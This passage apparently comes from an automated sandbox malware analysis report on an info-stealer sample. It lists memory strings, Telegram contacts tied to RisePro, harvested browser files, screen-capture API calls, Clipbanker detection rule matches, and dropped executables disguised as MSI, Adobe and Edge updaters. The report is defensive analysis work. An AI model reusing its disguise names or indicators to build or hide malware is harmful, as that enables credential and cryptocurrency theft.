Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, UhOL8vG3NSxPpn1EjM9IIxV.zip.0.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr	String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot7
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
Source: file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49717 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06F0C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC,

0_2_06F0C230

Protection of GUI

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06EE9080 OpenDesktopA,CreateDesktopA,

0_2_06EE9080

System Summary

Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown

Source: file.exe	Static PE information: section name: .vmp,,,0
Source: file.exe	Static PE information: section name: .vmp,,,1
Source: file.exe	Static PE information: section name: .vmp,,,2

Source: C:\Users\user\Desktop\file.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B8080		0_2_009B8080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090001D		0_2_0090001D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009FC8D0		0_2_009FC8D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095CBF0		0_2_0095CBF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00967D20		0_2_00967D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A040A0		0_2_00A040A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009F20C0		0_2_009F20C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B0350		0_2_009B0350
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090035F		0_2_0090035F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6269F		0_2_00A6269F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009147AD		0_2_009147AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FA918		0_2_008FA918
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FC950		0_2_008FC950
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A04AE0		0_2_00A04AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4EA59		0_2_00B4EA59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A4B90		0_2_009A4B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00918BA0		0_2_00918BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00918E20		0_2_00918E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009ACFC0		0_2_009ACFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B29025		0_2_00B29025
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F7190		0_2_008F7190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00961130		0_2_00961130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A03160		0_2_00A03160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6729A		0_2_00A6729A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF570		0_2_008EF570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBDB7F		0_2_00BBDB7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8FCED		0_2_00A8FCED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00961E40		0_2_00961E40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009ABFC0		0_2_009ABFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06EEA230		0_2_06EEA230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06F0C990		0_2_06F0C990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06F0D540		0_2_06F0D540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06EE9A10		0_2_06EE9A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06EF3B60		0_2_06EF3B60

Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 008DACE0 appears 62 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000003.2224536792.0000000006AC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2226429039.0000000006AC2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2231591589.0000000006ACB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2168366687.000000000688A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2171906117.0000000006887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2169325992.0000000006888000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
